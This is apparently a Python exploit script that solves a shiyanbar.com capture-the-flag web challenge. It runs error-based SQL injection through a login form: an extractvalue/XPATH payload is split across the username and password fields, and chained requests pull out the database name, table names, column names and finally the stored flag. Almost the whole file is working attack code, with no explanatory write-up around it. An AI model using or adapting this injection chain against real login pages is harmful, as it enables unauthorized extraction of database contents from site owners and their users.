# -*- coding:utf8 -*-
import requests
import re
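def denglu(username, password, *, proxies=None, timeout=30):
    """Submit one login form to the fixed challenge endpoint and return the cleaned response text.

    Posts ``username``/``password`` as a URL-encoded form to ``url`` below,
    then strips the ``<br>XPATH syntax error: `` marker, every single quote
    and every backslash from the response body and returns the part before
    the first comma.  When the body contains no comma the whole cleaned body
    is returned, so callers see whatever the page rendered.

    Args:
        username: value sent in the ``username`` form field.
        password: value sent in the ``password`` form field.
        proxies: optional ``requests``-style proxy mapping (for example a
            local intercepting proxy used while debugging).  The original
            function built such a mapping but never passed it to the request,
            so the default ``None`` keeps the original direct-connection
            behaviour.
        timeout: seconds to wait for the server before ``requests`` raises
            ``requests.exceptions.Timeout``; the original request had no
            limit and could block indefinitely on an unresponsive host.

    Returns:
        The cleaned response text, cut at the first comma.

    Raises:
        requests.exceptions.RequestException: on connection failure or timeout.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36",
        "Referer": "http://www.shiyanbar.com/ctf/2011",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
    }
    url = 'http://ctf5.shiyanbar.com/web/baocuo/index.php'
    payload = {'username': username, 'password': password}
    # The session is closed on exit; the original never closed it and never
    # used the cookie jar it extracted after the request.
    with requests.Session() as session:
        body = session.post(
            url,
            data=payload,
            headers=headers,
            proxies=proxies,
            timeout=timeout,
        ).text
    return _clean_error_text(body)


def _clean_error_text(body):
    """Strip the XPATH error marker, quotes and backslashes; return the text before the first comma."""
    cleaned = (
        body.replace("<br>XPATH syntax error: ", "")
        .replace("'", "")
        .replace("\\", "")
    )
    # ``str.split`` on a comma-free string yields a one-element list, so this
    # single expression covers both branches of the original ``if "," in r``.
    return cleaned.split(",", 1)[0]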
# Four chained requests; each answer is spliced into the next request's
# password field.  The username field is the same fixed text every time.
_PROBE_USER = "'or extractvalue /*"

# Step 1: database name
database = denglu(_PROBE_USER, "*/(1, concat(0x5c,(SELECT database()))) or'")
print(database)

# Step 2: table names in that database
table = denglu(
    _PROBE_USER,
    "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables where TABLE_SCHEMA REGEXP '{}'))) or'".format(database),
)
print(table)

# Step 3: column names of that table
column = denglu(
    _PROBE_USER,
    "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(column_name) from information_schema.KEY_COLUMN_USAGE where table_schema REGEXP database() and table_name REGEXP '{}'))) or'".format(table),
)
print(column)

# Step 4: the flag value itself
result = denglu(
    _PROBE_USER,
    "*/(1, concat(0x5c,(SELECT {} FROM {}))) or'".format(column, table),
)
print(result)